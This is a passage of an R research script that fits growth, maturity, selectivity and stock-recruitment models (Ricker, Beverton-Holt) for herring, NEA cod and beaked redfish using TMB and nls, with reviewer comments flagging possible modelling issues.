obj <- MakeADFun(data, param,DLL="weight")
opt <- nlminb(obj$par, obj$fn, obj$gr)
## parameter estimates
k <- opt$par[1]
b <- opt$par[2]
Winf <- opt$par[3]
weights <- Winf * (1-exp(-k * age))^b ### used in simulation
weights3$wprop.est <- Winf * (1-exp(-k * weights3$Age))^b
## Observed weights (points) with the fitted curve (line); panel tag "a".
nsshwei <- weights3 %>%
ggplot(aes(x=Age,y=value)) + geom_point(size= 2.5) +
geom_line(inherit.aes=F,aes(x=Age,y=wprop.est), size= 0.6) + labs(y= "Weight (kg)", x= "Age") + theme_bw() + theme(panel.background = element_blank(), panel.grid.major = element_blank(), panel.grid.minor = element_blank(), axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20), axis.text.x = element_text(size=20), axis.title.x = element_text(size=30), axis.title.y = element_text(size=30))+ labs(tag="a")
##### Selectivity #####
## Fit a logistic fishing-selectivity curve 1/(1+exp(-(age-s50)/ss)) to NSSH
## F-at-age, after ad hoc normalisation of the raw F values.
fmort2<-melt(nsshfmort,id.vars="Year")
fmort2$Age <- rep(2:12,each=dim(nsshfmort)[1])
fmort2 %>%
ggplot(aes(x=Age,y=value, color=as.factor(Year))) + geom_point()
### ad hoc fix: everything above age 5 is fully selected
fmort2 <- fmort2 %>% mutate(sel=ifelse(Age>5,1,value/max(value[Age<5])),sel=ifelse(sel>1,1,sel))
fmort2 %>%
ggplot(aes(x=Age,y=sel, color=as.factor(Year))) + geom_point()
### using aggregated data
fmort3 <- fmort2 %>% group_by(Age) %>% summarise(sel=mean(sel))
### ad hoc fix: everything below age 3 is not fished
fmort3 <- fmort3 %>% mutate(sel=case_when(Age<3 ~ 0,TRUE ~ sel))
compile('Scripts/sel.cpp')
dyn.load(dynlib('Scripts/sel'))
data<-list()
data$age<-fmort3$Age
data$sel<-fmort3$sel
param <- list()
param$s50 <- 7 # starting value: age at 50% selectivity
param$ss <- 1 # starting value: selectivity slope
param$logsigma <-0
obj <- MakeADFun(data, param,DLL="sel")
opt <- nlminb(obj$par, obj$fn, obj$gr)
## parameter estimates
s50 <- opt$par[1]
ss <- opt$par[2]
Fsel <- 1/(1+exp(-((age-s50)/ss))) ### used in simulation
fmort3$sel.est <- 1/(1+exp(-((fmort3$Age-s50)/ss)))
## Mean selectivity-at-age (points) with the fitted logistic curve; tag "a".
nsshfsel <- fmort3 %>%
ggplot(aes(x=Age,y=sel)) + geom_point(size= 2.5) +
geom_line(inherit.aes=F,aes(x=Age,y=sel.est), size= 0.6)+ labs(y= "Fishing selectivity", x= "Age") + theme_bw() + theme(panel.background = element_blank(), panel.grid.major = element_blank(), panel.grid.minor = element_blank(), axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20), axis.text.x = element_text(size=20), axis.title.x = element_text(size=20), axis.title.y = element_text(size=20))+ labs(tag="a") + scale_x_continuous(breaks=c(2,6, 10))
#######################################################################
######--------------- NEA COD --------------- #############
#######################################################################
## NEA cod: ages 3-15, recruitment at age 3.
age <- c(3:15) ## maximum age 3-15
recage<- 3
start.rec <- mean(codass$Rec.age3)*1000
#### Recruitment: important to correct for the rec.age offset ####
## Lag SSB by recage years so recruits are paired with their parent SSB.
tsl<-length(codass$Year)
Rec <- codass$Rec.age3[(recage+1):tsl]*1000
SSB <- codass$SSBtonnes[1:(tsl-(recage))]
Rec <- Rec/1000000000 # for plotting
SSB <- SSB/1000000 #for plotting
## 5. Ricker
## Ricker fit via the linearised form log(R/SSB) = alpha + beta*SSB.
data<-list()
data$SSB<-SSB #c(0,SSB)
data$Rec<-Rec #c(0,rep(mean(Rec),length(Rec)))
#nlsricker<- nls(Rec~alpha*SSB*exp(beta*SSB),data=data,start=list(alpha=1e7,beta=1e-7))
nlsrssb <- nls(log(Rec/SSB) ~ alpha+(beta*SSB),data=data,start=list(alpha=5,beta=-1), na.action = na.omit)
alphar <- summary(nlsrssb)$coefficients[1]
betar <- summary(nlsrssb)$coefficients[2]
#Recruitment5 <- exp(alpha)*data$SSB*exp(beta*data$SSB)
RSSB5 <- alphar +betar *data$SSB
ricker.sd<-sd(residuals(nlsrssb))
ricker.mean<-mean(residuals(nlsrssb))
autocorrelation<-acf(residuals(nlsrssb))
AR1par <-autocorrelation$acf[2] # lag-1 autocorrelation of the residuals
# Theoretical SSB1
SSB1<-seq(0, 6e6, 1e3)
SSB1<- SSB1/1000000 # for plotting
## NOTE(review): unlike the NSSH section, the stochastic variants here are not
## divided by a lognormal bias-correction factor -- confirm this is intended.
Recruitment5 <- exp(alphar)*SSB1*exp(betar *SSB1) #Deterministic stock-recruitment version
Rvariation<-rnorm(length(SSB1),0,ricker.sd) #Norm. dist. error term (on log-scale)
Recruitment5.1 <- exp(alphar)*SSB1*exp(betar *SSB1) * exp(Rvariation) #- Stochasticity
Rvariationacf<-c(Rvariation[1],AR1par*Rvariation[1:(length(SSB1)-1)]+Rvariation[2:length(SSB1)]) #- autocorrelation
Recruitment5.2 <- exp(alphar)*SSB1 *exp(betar *SSB1) *exp(Rvariationacf) #- stochasticity
plot(Recruitment5~SSB1,type="l",col="red", xlim=c(0,6), ylim=c(0,3), xlab="SSB1 million t", ylab="Rec billions")
points(Recruitment5.1~SSB1,col="blue",pch=1)
points(Recruitment5.2~SSB1,col="purple",pch=2)
points(Rec~SSB,pch=16)
##---- Compare with assessed SSB --- SSB real data
Recruitment5 <- exp(alphar)*SSB*exp(betar*SSB) #- Deterministic stock-recruitment version
Rvariation<-rnorm(length(SSB),0,ricker.sd) #- Norm. dist. error term (on log-scale)
Recruitment5.1 <- exp(alphar)*SSB*exp(betar *SSB) * exp(Rvariation) #- stochasticity
Rvariationacf<-c(Rvariation[1],AR1par*Rvariation[1:(length(SSB)-1)]+Rvariation[2:length(SSB)]) #- AR1 autocorr to error term
Recruitment5.2 <- exp(alphar)*SSB *exp(betar *SSB) *exp(Rvariationacf) #- stochasticity
plot(Recruitment5~SSB,col="red", type="l", xlab="SSB1 million t", ylab="Rec billions")
points(Recruitment5.1~SSB,col="blue",pch=1)
points(Recruitment5.2~SSB,col="purple",pch=2)
points(Rec~SSB,pch=16)
## Sums of squared deviations from assessed recruitment for the three variants.
c(sum((Rec-Recruitment5)^2),sum((Rec-Recruitment5.1)^2),sum((Rec-Recruitment5.2)^2))
###### BH (trying again 2/2 2022)
# 1/R = beta + alpha * 1/SSB algebraic transformation of BH
#run first lines of NEA rec to load data
## Beverton-Holt fit for cod via the linearising transformation of BH.
data<-list()
data$SSB<-SSB #c(0,SSB)
data$Rec<-Rec #c(0,rep(mean(Rec),length(Rec)))
## BH algebraic transformation, estimating base of ICES data
bhalge <- nls(1/Rec ~ beta + alpha * (1/SSB), data=data, start = list(alpha=5, beta=-1))
alphabh <- summary(bhalge)$coefficients[1]
betabh <- summary(bhalge)$coefficients[2]
# SSB1 theoretical numbers to test alpha & beta estimates
SSB1 <- seq(0,9e6,1e5)
#SSB1 <- SSB1/1000000 #for plotting
## NOTE(review): SSB1 is defined above but codRec6 is evaluated on the assessed
## SSB, not SSB1 -- confirm which grid was intended.
codRec6 <- betabh + alphabh * (1/SSB) # testing the alpha and beta, works!
plot(1/codRec6 ~ SSB,type="l",col="red")
####### dont use any of this
## BH - alpha and beta estimated in TMB - 2 options ##
#Recruitment6 <- exp(alphabh +log(SSB)-log(exp(betabh)*SSB))
#Recruitment6 <- (alphabh*SSB)/(1+betabh*SSB) ### dont use this
#plot(Recruitment6 ~ SSB,type="l",col="red")
## plot
## Assessment data plus the Ricker variants evaluated at assessed SSB.
rec.vector<-c(Rec,Recruitment5,Recruitment5.1, Recruitment5.2)
type<-rep(c("Real","Ricker","Ricker5.1", "Ricker5.2"),each=length(Rec))
rec.df<-data.frame(Type=type,SSB=rep(SSB,4),Rec=rec.vector)
rec.df %>% ggplot(aes(x=SSB,y=Rec,color=Type)) + geom_point(size=3) +
scale_color_brewer(palette="Accent") + theme_bw()
##### BEVERTON-HOLT
# ## 6. BH - NB: fit depends heavily on starting values and sucks (tends to become constant)
# compile('Scripts/bh.cpp')
# dyn.load(dynlib('Scripts/bh'))
#
# data<-list()
# data$ssb<-SSB
# data$logR<-log(Rec)
#
# param <- list()
# param$loga <- 1
# param$logb <- 1
# param$logsigma <-0
#
# obj <- MakeADFun(data, param,DLL="bh")
# optbh <- nlminb(obj$par, obj$fn, obj$gr)
#
# Recruitment6 <- (optbh$par[1]*SSB)/(1+optbh$par[2]*SSB) #exp(optbh$par[1]+log(SSB)-log(exp(optbh$par[2])*SSB))
#
# alphabh <- optbh$par[1]
# betabh <- optbh$par[2]
#
#
# plot(Recruitment6~SSB, col="red", pch=3)
#
# ## plot
# rec.vector<-c(Rec, Recruitment5, Recruitment6)
# type<-rep(c("Real","Ricker","BH"),each=length(Rec))
# rec.df<-data.frame(Type=type,SSB=rep(SSB,3),Rec=rec.vector)
#
# rec.df %>% ggplot(aes(x=SSB,y=Rec,color=Type)) + geom_point(size=3) +
# scale_color_brewer(palette="Accent") + theme_bw()
##### BEVERTON-HOLT continued (another way)
## Same linearised BH fit as above, then deterministic / additive-noise /
## AR1-noise variants on a theoretical SSB grid and at the assessed SSB.
data<-list()
data$SSB<-SSB #c(0,SSB)
data$Rec<-Rec #c(0,rep(mean(Rec),length(Rec)))
nlsrssb <- nls(1/Rec ~ beta + alpha / SSB, data=data,start=list(alpha=5,beta=-1))
alphabh <- summary(nlsrssb)$coefficients[1]
betabh <- summary(nlsrssb)$coefficients[2]
#Recruitment6 <- exp(alpha)*data$SSB*exp(beta*data$SSB)
RSSB6 <- SSB/(alphabh +betabh *SSB)
## NOTE(review): this is the RECIPROCAL of the residual sd (residuals are on
## the 1/Rec scale); confirm 1/sd(...) rather than sd(...) is intended before
## using bh.sd as a noise standard deviation below.
bh.sd <- 1/sd(residuals(nlsrssb))
bh.mean <- mean(residuals(nlsrssb))
autocorrelation <- acf(residuals(nlsrssb))
AR1par <- autocorrelation$acf[2] # lag-1 autocorrelation of the residuals
# Theoretical SSB1
SSB1<-seq(0, 4e6, 1e5)
Recruitment6 <- SSB1/(alphabh +betabh *SSB1) #Deterministic stock-recruitment version
Rvariation<-rnorm(length(SSB1),0,bh.sd) #Norm. dist. errorterm (on log-scale)
Recruitment6.1 <- SSB1/(alphabh +betabh *SSB1) + Rvariation #- stochasticity
Rvariationacf<-c(Rvariation[1],AR1par*Rvariation[1:(length(SSB1)-1)]+Rvariation[2:length(SSB1)]) #- AR1 autocorr to error term
Recruitment6.2 <- SSB1/(alphabh +betabh *SSB1) + Rvariationacf #- stochasticity
plot(Recruitment6~SSB1,col="red", type="l",ylim=c(0,max(Rec)*1.2))
points(Recruitment6.1~SSB1,col="blue",pch=1)
points(Recruitment6.2~SSB1,col="purple",pch=2)
points(Rec~SSB,pch=16)
##---- Compare with assessed SSB --- SSB real data
Recruitment6 <- SSB/(alphabh +betabh *SSB) #Deterministic stock-recruitment version
Rvariation<-rnorm(length(SSB),0,bh.sd) #Norm. dist. errorterm (on log-scale)
Recruitment6.1 <- SSB/(alphabh +betabh *SSB) + Rvariation #- stochasticity
Rvariationacf<-c(Rvariation[1],AR1par*Rvariation[1:(length(SSB)-1)]+Rvariation[2:length(SSB)]) #- AR1 autocorr to error term
Recruitment6.2 <- SSB/(alphabh +betabh *SSB) + Rvariationacf #- stochasticity
plot(Recruitment6~SSB,col="red", pch=3,ylim=c(0,max(Rec)*1.2))
points(Recruitment6.1~SSB,col="blue",pch=1)
points(Recruitment6.2~SSB,col="purple",pch=2)
points(Rec~SSB,pch=16)
## BUG FIX: this SSQ line previously compared the Ricker series (Recruitment5,
## Recruitment5.1, Recruitment5.2) -- a copy-paste from the Ricker section --
## instead of the BH variants computed just above.
c(sum((Rec-Recruitment6)^2),sum((Rec-Recruitment6.1)^2),sum((Rec-Recruitment6.2)^2))
## plot
rec.vector<-c(Rec, Recruitment5, Recruitment6)
type<-rep(c("Real","Ricker","BH"),each=length(Rec))
rec.df<-data.frame(Type=type,SSB=rep(SSB,3),Rec=rec.vector)
rec.df %>% ggplot(aes(x=SSB,y=Rec,color=Type)) + geom_point(size=3) +
scale_color_brewer(palette="Accent") + theme_bw()
##### Maturity #####
## Fit a logistic maturity ogive to cod maturity-at-age via TMB
## (a50 = age at 50% maturity, env = slope).
maturity2 <-melt(codmaturity,id.vars="Year")
maturity2$Age <- rep(3:15,each=dim(codmaturity)[1])
maturity2 %>%
ggplot(aes(x=Age,y=value,color=as.factor(Year))) + geom_line()
compile('Scripts/maturity.cpp')
dyn.load(dynlib('Scripts/maturity'))
data<-list()
data$age<-maturity2$Age
data$mprop<-maturity2$value
param <- list()
param$a50 <- 4 # starting value: age at 50% maturity
param$env <- .2 # starting value: ogive slope
param$logsigma <-0
obj <- MakeADFun(data, param,DLL="maturity")
opt <- nlminb(obj$par, obj$fn, obj$gr)
## parameter estimates
a50 <- opt$par[1]
env <- opt$par[2]
maturity <- round(1/(1+exp(-((age-a50)/env))),2) ## used in simulation
maturity2$mprop.est <- 1/(1+exp(-((maturity2$Age-a50)/env)))
## Observed maturity (points) with the fitted ogive (line); panel tag "b".
codmat<-maturity2 %>%
ggplot(aes(x=Age,y=value)) + geom_point(size= 2.5) +
geom_line(inherit.aes=F,aes(x=Age,y=mprop.est), size= 0.6) + labs(y= "Maturity", x= "Age") + theme_bw() + theme(panel.background = element_blank(), panel.grid.major = element_blank(), panel.grid.minor = element_blank(), axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20), axis.text.x = element_text(size=20), axis.title.x = element_text(size=30), axis.title.y = element_text(size=30))+ labs(tag="b")
##### Weights #####
## Fit the weight-at-age curve W = Winf*(1-exp(-k*age))^b to cod data via TMB.
weights2 <-melt(codweight,id.vars="Year")
weights2$Age <- rep(3:15,each=dim(codweight)[1])
weights2 %>%
ggplot(aes(x=Age,y=value,color=as.factor(Year))) + geom_line()
compile('Scripts/weight.cpp')
dyn.load(dynlib('Scripts/weight'))
data<-list()
data$age<-weights2$Age
data$wprop<-weights2$value
param <- list()
param$k <- 0.4 # starting value: growth rate
param$b <- 3 # starting value: exponent
param$Winf <- 0.4 # starting value: asymptotic weight
param$logsigma <- 0
obj <- MakeADFun(data, param,DLL="weight")
opt <- nlminb(obj$par, obj$fn, obj$gr)
## parameter estimates
k <- opt$par[1]
b <- opt$par[2]
Winf <- opt$par[3]
weights <- Winf * (1-exp(-k * age))^b ### used in simulation
weights2$wprop.est <- Winf * (1-exp(-k * weights2$Age))^b
## Observed weights (points) with the fitted curve (line); panel tag "b".
codwei<-weights2 %>%
ggplot(aes(x=Age,y=value)) + geom_point(size= 2.5) +
geom_line(inherit.aes=F,aes(x=Age,y=wprop.est), size= 0.6) + labs(y= "Weight (kg)", x= "Age") + theme_bw() + theme(panel.background = element_blank(), panel.grid.major = element_blank(), panel.grid.minor = element_blank(), axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20), axis.text.x = element_text(size=20), axis.title.x = element_text(size=30), axis.title.y = element_text(size=30))+ labs(tag="b")
##### Selectivity #####
## Fit a logistic fishing-selectivity curve to cod mean F-at-age
## (normalised to a 0-1 scale by the maximum mean F).
fmort2<-melt(codfmort,id.vars="Year")
fmort2$Age <- rep(3:15,each=dim(codfmort)[1])
fmort2 %>%
ggplot(aes(x=Age,y=value,color=as.factor(Year))) + geom_point()
### using aggregated data
fmort3 <- fmort2 %>% group_by(Age) %>% summarise(fmean=mean(value))
fmort3 <- fmort3 %>% mutate(sel=fmean/max(fmean))
compile('Scripts/sel.cpp')
dyn.load(dynlib('Scripts/sel'))
data<-list()
data$age<-fmort3$Age
data$sel<-fmort3$sel
param <- list()
param$s50 <- 7 # starting value: age at 50% selectivity
param$ss <- 1 # starting value: selectivity slope
param$logsigma <-0
obj <- MakeADFun(data, param,DLL="sel")
opt <- nlminb(obj$par, obj$fn, obj$gr)
## parameter estimates
s50 <- opt$par[1]
ss <- opt$par[2]
Fsel <- 1/(1+exp(-((age-s50)/ss))) ### used in simulation
fmort3$sel.est <- 1/(1+exp(-((fmort3$Age-s50)/ss)))
## Mean selectivity-at-age (points) with the fitted logistic curve; tag "b".
codfsel<- fmort3 %>%
ggplot(aes(x=Age,y=sel)) + geom_point(size= 2.5) +
geom_line(inherit.aes=F,aes(x=Age,y=sel.est), size= 0.6)+ labs(y= "Fishing selectivity", x= "Age") + theme_bw() + theme(panel.background = element_blank(), panel.grid.major = element_blank(), panel.grid.minor = element_blank(), axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20), axis.text.x = element_text(size=20), axis.title.x = element_text(size=20), axis.title.y = element_text(size=20))+ labs(tag="b")
#######################################################################
######--------------- BEAKED REDFISH --------------- #############
#######################################################################
## Beaked redfish (S. mentella): ages 2-40, recruitment at age 2.
recage <- 2
amax <- 40
age <- recage:amax
start.rec <- mean(redfishass2$Rec.age2thousand)*1000
#### Recruitment ####
## Lag SSB by recage years so recruits are paired with their parent SSB.
## Two assessments available; the 2018 (redfishass2) one is active here.
tsl <- length(redfishass2$Year) #old assesment 2018
Rec <- redfishass2$Rec.age2thousand[(recage+1):tsl]*1000 #old assesment 2018
SSB <- redfishass2$StockBiomass.t[1:(tsl-(recage))] #old assesment 2018
#tsl <- length(redfishass$Year) #old assesment 2019
#Rec <- redfishass$Rec.age2.1000[(recage+1):tsl]*1000 #old assesment 2019
#SSB <- redfishass$SSB.tonnes[1:(tsl-(recage))]
Rec <- Rec/1000000000 # for plotting million
SSB <- SSB/1000000 #for plotting thousands
## 5. Ricker
## Ricker fit for redfish via the linearised form log(R/SSB) = alpha + beta*SSB.
data<-list()
data$SSB<-SSB #c(0,SSB)
data$Rec<-Rec #c(0,rep(mean(Rec),length(Rec)))
#nlsricker<- nls(Rec~alpha*SSB*exp(beta*SSB),data=data,start=list(alpha=1e7,beta=1e-7))
nlsrssb <- nls(log(Rec/SSB) ~ alpha+(beta*SSB),data=data,start=list(alpha=5,beta=-1))
alphar <- summary(nlsrssb)$coefficients[1]
betar <- summary(nlsrssb)$coefficients[2]
Recruitment6 <- exp(alphar)*data$SSB*exp(betar*data$SSB)
RSSB5 <- alphar +betar *data$SSB
ricker.sd <-sd(residuals(nlsrssb))
ricker.mean<-mean(residuals(nlsrssb))
autocorrelation<-acf(residuals(nlsrssb))
AR1par <-autocorrelation$acf[2] # lag-1 autocorrelation of the residuals
# Theoretical SSB1
SSB1<-seq(0,9e6,1e5)
SSB1 <- SSB1/1000000 #for plotting
redRecruitment5 <- exp(alphar)*SSB1*exp(betar *SSB1) #- Deterministic stock-recruitment version
Rvariation<-rnorm(length(SSB1),0,ricker.sd) #- Norm dist. error term (on log-scale)
Recruitment5.1 <- exp(alphar)*SSB1*exp(betar *SSB1) * exp(Rvariation) #- stochasticity
Rvariationacf<-c(Rvariation[1],AR1par*Rvariation[1:(length(SSB1)-1)]+Rvariation[2:length(SSB1)]) #- autocorrelation
Recruitment5.2 <- exp(alphar)*SSB1 *exp(betar *SSB1) *exp(Rvariationacf) #- stochasticity
## BUG FIX: the plot referenced `redRecruitment5_2018`, which is never created
## in this script (the object computed above is `redRecruitment5`).
plot(redRecruitment5~SSB1,type="l",col="blue") #xlim=c(0, 3000000), ylim=c(0, 10e+08), xlab="SSB1 million t", ylab="Rec billions")
points(Recruitment5.1~SSB1,col="blue",pch=1)
points(Recruitment5.2~SSB1,col="purple",pch=2)
points(Rec~SSB,pch=16)
points(y=Rec, x=SSB)
## NOTE(review): the overlays below referenced objects that are never defined
## in this script (redRec6_2018, redRec6_2019, redRecruitment5_2019) and would
## error at runtime; commented out until those objects exist.
#points(y=1/redRec6_2018, x=SSB1, col="blue")
#points(y=1/redRec6_2019, x=SSB1, col="red")
#points(y=redRecruitment5_2019, x=SSB1, col="red", pch=3)
##---- Compare with assessed SSB --- SSB real data
## Re-evaluate the redfish Ricker curve at the assessed SSB values.
Recruitment5 <- exp(alphar)*SSB*exp(betar*SSB) #- Deterministic stock-recruitment version
Rvariation<-rnorm(length(SSB),0,ricker.sd) #- Norm. dist. error term (on log-scale)
Recruitment5.1 <- exp(alphar)*SSB*exp(betar *SSB) * exp(Rvariation) #- stochasticity
Rvariationacf<-c(Rvariation[1],AR1par*Rvariation[1:(length(SSB)-1)]+Rvariation[2:length(SSB)]) #- AR1 autocorr to error term
Recruitment5.2 <- exp(alphar)*SSB *exp(betar *SSB) *exp(Rvariationacf) #- stochasticity
## NOTE(review): the base curve is drawn over the theoretical SSB1 grid while
## the points use assessed SSB -- confirm the mixed x-grids are intended.
plot(redRecruitment5~SSB1,type="l",col="red") # xlim= c(0, 10e+05), ylim=c(0, 2e+09))
points(Recruitment5~SSB,col="blue",pch=1)
points(Recruitment5.2~SSB,col="purple",pch=2)
points(Rec~SSB,pch=16)
## Sums of squared deviations from assessed recruitment for the three variants.
c(sum((Rec-Recruitment5)^2),sum((Rec-Recruitment5.1)^2),sum((Rec-Recruitment5.2)^2))
###### BH (trying again 2/2 2022)
# 1/R = beta + alpha * 1/SSB algebraic transformation of BH
## Beverton-Holt fit for redfish via the linearising transformation,
## using the 2018 assessment series (2019 lines kept commented for reference).
tsl <- length(redfishass2$Year) #old assesment 2018
Rec <- redfishass2$Rec.age2thousand[(recage+1):tsl]*1000 #old assesment 2018
SSB <- redfishass2$StockBiomass.t[1:(tsl-(recage))] #old assesment 2018
#tsl <- length(redfishass$Year) #old assesment 2019
#Rec <- redfishass$Rec.age2.1000[(recage+1):tsl]*1000 #old assesment 2019
#SSB <- redfishass$SSB.tonnes[1:(tsl-(recage))]
Rec <- Rec/1000000000 # for plotting million
SSB <- SSB/1000000 #for plotting thousands
data<-list()
data$SSB<-SSB #c(0,SSB)
data$Rec<-Rec #c(0,rep(mean(Rec),length(Rec)))
## BH algebraic transformation, estimating base of ICES data
bhalge <- nls(1/Rec ~ beta + alpha * (1/SSB), data=data, start = list(alpha=5, beta=-1))
alphabh <- summary(bhalge)$coefficients[1]
betabh <- summary(bhalge)$coefficients[2]
# SSB1 theoretical numbers to test alpha & beta estimates
SSB1 <- seq(0,9e6,1e5)
SSB1 <- SSB1/1000000 #for plotting
## Note: redRecruitment6 is on the 1/Rec scale; it is inverted when plotted.
redRecruitment6 <- betabh + alphabh * (1/SSB1) # testing the alpha and beta, works!
plot(1/redRecruitment6 ~ SSB1,type="l",col="red")
points(x=SSB, y=Rec)
####### dont use any of this
## BH - alpha and beta estimated in TMB - 2 options ##
#Recruitment6 <- exp(alphabh +log(SSB)-log(exp(betabh)*SSB))
#Recruitment6 <- (alphabh*SSB)/(1+betabh*SSB) ### dont use this
#plot(Recruitment6 ~ SSB,type="l",col="red")
#---- Plotting all ----#
## Combine the Ricker and (inverted) BH curves on the SSB1 grid.
rec.vector <- c(redRecruitment5, 1/redRecruitment6)
type <-rep(c("Ricker5", "BH"),each=length(redRecruitment5))
rec.df <- data.frame(Type=type, SSB=rep(SSB1,2),Rec=rec.vector)
rec.df %>% ggplot(aes(x=SSB,y=Rec, color=Type)) + geom_line(size=1.5) +
scale_color_brewer(palette="Accent") +
theme_bw() + theme(panel.background = element_blank(),
panel.grid.major = element_blank(), panel.grid.minor = element_blank(),
axis.line = element_line(colour = "black"), axis.text.y = element_text(size=15),
axis.text.x = element_text(size=15), axis.title.x = element_text(size=20),
axis.title.y = element_text(size=20))
##### Maturity #####
## Fit a logistic maturity ogive to redfish maturity-at-age via TMB.
## BUG FIX: the original stored the melted data in `maturity`, then overwrote
## `maturity` with the rounded simulation vector and immediately attempted
## `maturity$mprop.est <- ...` and `maturity %>% ggplot(...)` -- `$` on an
## atomic vector errors and the plots break. The observed data now live in
## `maturitydf`; the simulation vector keeps its original name `maturity`.
maturitydf <-melt(redfishmaturity,id.vars="Year")
maturitydf$Age <- rep(6:19,each=dim(redfishmaturity)[1])
maturitydf %>%
ggplot(aes(x=Age,y=value,color=as.factor(Year))) + geom_line()
compile('Scripts_R/maturity.cpp')
dyn.load(dynlib('Scripts_R/maturity'))
data<-list()
data$age<-maturitydf$Age
data$mprop<-maturitydf$value
param <- list()
param$a50 <- 4 # starting value: age at 50% maturity
param$env <- .2 # starting value: ogive slope
param$logsigma <-0
obj <- MakeADFun(data, param,DLL="maturity")
opt <- nlminb(obj$par, obj$fn, obj$gr)
## parameter estimates
a50 <- opt$par[1]
env <- opt$par[2]
maturity <- round(1/(1+exp(-((unique(age)-a50)/env))),2) ## used in simulation
maturitydf$mprop.est <- 1/(1+exp(-((maturitydf$Age-a50)/env)))
redmat<- maturitydf %>%
ggplot(aes(x=Age,y=value)) + geom_point(size= 2.5) +
geom_line(inherit.aes=F,aes(x=Age,y=mprop.est), size= 0.6) +
labs(y= "Maturity", x= "Age") +
theme_bw() + theme(panel.background = element_blank(), panel.grid.major = element_blank(), panel.grid.minor = element_blank(), axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20), axis.text.x = element_text(size=20), axis.title.x = element_text(size=30), axis.title.y = element_text(size=30)) + labs(tag="c")
## Ogive extended to the full simulated age range (6-40) for plotting.
maturityforplot <- list()
maturityforplot$Age <- c(6:40)
maturityforplot$mprop.est <- 1/(1+exp(-((c(6:40)-a50)/env)))
maturityforplot <- as.data.frame(maturityforplot)
redmat <- ggplot(data=maturityforplot, inherit.aes=F, aes(x=Age,y=mprop.est)) +
geom_line(color="red",size= 0.6) +
labs(y= "Maturity", x= "Age") +
theme_bw() + theme(panel.background = element_blank(),
panel.grid.major = element_blank(), panel.grid.minor = element_blank(),
axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20),
axis.text.x = element_text(size=20), axis.title.x = element_text(size=30),
axis.title.y = element_text(size=30)) + labs(tag="c")
redmat + geom_point(data= maturitydf,aes(x=Age,y=value), size= 2.5)
##### Weights #####
## Fit the weight-at-age curve W = Winf*(1-exp(-k*age))^b to redfish data via TMB.
weights2 <-melt(redfishweight,id.vars="Year")
weights2$Age <- rep(6:19,each=dim(redfishweight)[1])
weights2 %>%
ggplot(aes(x=Age,y=value,color=as.factor(Year))) + geom_line()
compile('Scripts_R/weight.cpp')
dyn.load(dynlib('Scripts_R/weight'))
data<-list()
data$age<-weights2$Age
data$wprop<-weights2$value
param <- list()
param$k <- 0.4 # starting value: growth rate
param$b <- 3 # starting value: exponent
param$Winf <- 0.4 # starting value: asymptotic weight
param$logsigma <- 0
obj <- MakeADFun(data, param,DLL="weight")
opt <- nlminb(obj$par, obj$fn, obj$gr)
## parameter estimates
k <- opt$par[1]
b <- opt$par[2]
Winf <- opt$par[3]
weights <- Winf * (1-exp(-k * age))^b ### used in simulation
weights2$wprop.est <- Winf * (1-exp(-k * weights2$Age))^b
redwei<- weights2 %>%
ggplot(aes(x=Age,y=value)) + geom_point(size= 3) +
geom_line(inherit.aes=F,aes(x=Age,y=wprop.est), size= 0.6) +
labs(y= "Weight (kg)", x= "Age") + theme_bw() + theme(panel.background = element_blank(), panel.grid.major = element_blank(), panel.grid.minor = element_blank(), axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20), axis.text.x = element_text(size=20), axis.title.x = element_text(size=30), axis.title.y = element_text(size=30)) + labs(tag="c")
## Fitted curve extended to the full simulated age range (6-40) for plotting;
## note this second assignment overwrites the `redwei` plot built just above.
weightforplot <- list()
weightforplot$Age <- c(6:40)
weightforplot$wprop.est <- Winf * (1-exp(-k * (c(6:40))))^b
weightforplot <- as.data.frame(weightforplot)
redwei <- ggplot(data=weightforplot, inherit.aes=F, aes(x=Age,y=wprop.est)) +
geom_line(color="red",size= 0.6) +
theme_bw() + theme(panel.background = element_blank(),
panel.grid.major = element_blank(), panel.grid.minor = element_blank(),
axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20),
axis.text.x = element_text(size=20), axis.title.x = element_blank(),
axis.title.y = element_blank())
redwei + geom_point(data= weights2, aes(x=Age,y=value), size= 2.5)
##### Selectivity #####
## Fit a logistic fishing-selectivity curve to redfish mean F-at-age
## (normalised to a 0-1 scale by the maximum mean F).
fmort2<-melt(redfishfmort,id.vars="Year")
fmort2$Age <- rep(2:19,each=dim(redfishfmort)[1])
fmort2 %>%
ggplot(aes(x=Age,y=value,color=as.factor(Year))) + geom_point()
### using aggregated data
fmort3 <- fmort2 %>% group_by(Age) %>% summarise(fmean=mean(value))
fmort3 <- fmort3 %>% mutate(sel=fmean/max(fmean))
compile('Scripts/sel.cpp')
dyn.load(dynlib('Scripts/sel'))
data<-list()
data$age<-fmort3$Age
data$sel<-fmort3$sel
param <- list()
param$s50 <- 7 # starting value: age at 50% selectivity
param$ss <- 1 # starting value: selectivity slope
param$logsigma <-0
obj <- MakeADFun(data, param,DLL="sel") # MakeADFun - automatic differentiation function
opt <- nlminb(obj$par, obj$fn, obj$gr)
## parameter estimates
s50 <- opt$par[1]
ss <- opt$par[2]
Fsel <- 1/(1+exp(-((age-s50)/ss))) ### used in simulation
fmort3$sel.est <- 1/(1+exp(-((fmort3$Age-s50)/ss)))
redfsel <- fmort3 %>%
ggplot(aes(x=Age,y=sel)) + geom_point(size= 2.5) +
geom_line(inherit.aes=F,aes(x=Age,y=sel.est), size= 0.6) +
labs(y= "Fishing selectivity", x= "Age") +
theme_bw() + theme(panel.background = element_blank(),
panel.grid.major = element_blank(),
panel.grid.minor = element_blank(),
axis.line = element_line(colour = "black"),
axis.text.y = element_text(size=20),
axis.text.x = element_text(size=20),
axis.title.x = element_text(size=20),
axis.title.y = element_text(size=20)) + labs(tag="c")
## Fitted curve extended to the full simulated age range (2-40) for plotting;
## note this second assignment overwrites the `redfsel` plot built just above.
fselforplot <- list()
fselforplot$Age <- c(2:40)
fselforplot$fselprop.est <- 1/(1+exp(-(((c(2:40))-s50)/ss)))
fselforplot <- as.data.frame(fselforplot)
redfsel <- ggplot(data=fselforplot, inherit.aes=F, aes(x=Age,y=fselprop.est)) +
geom_line(color="red",size= 0.6) +
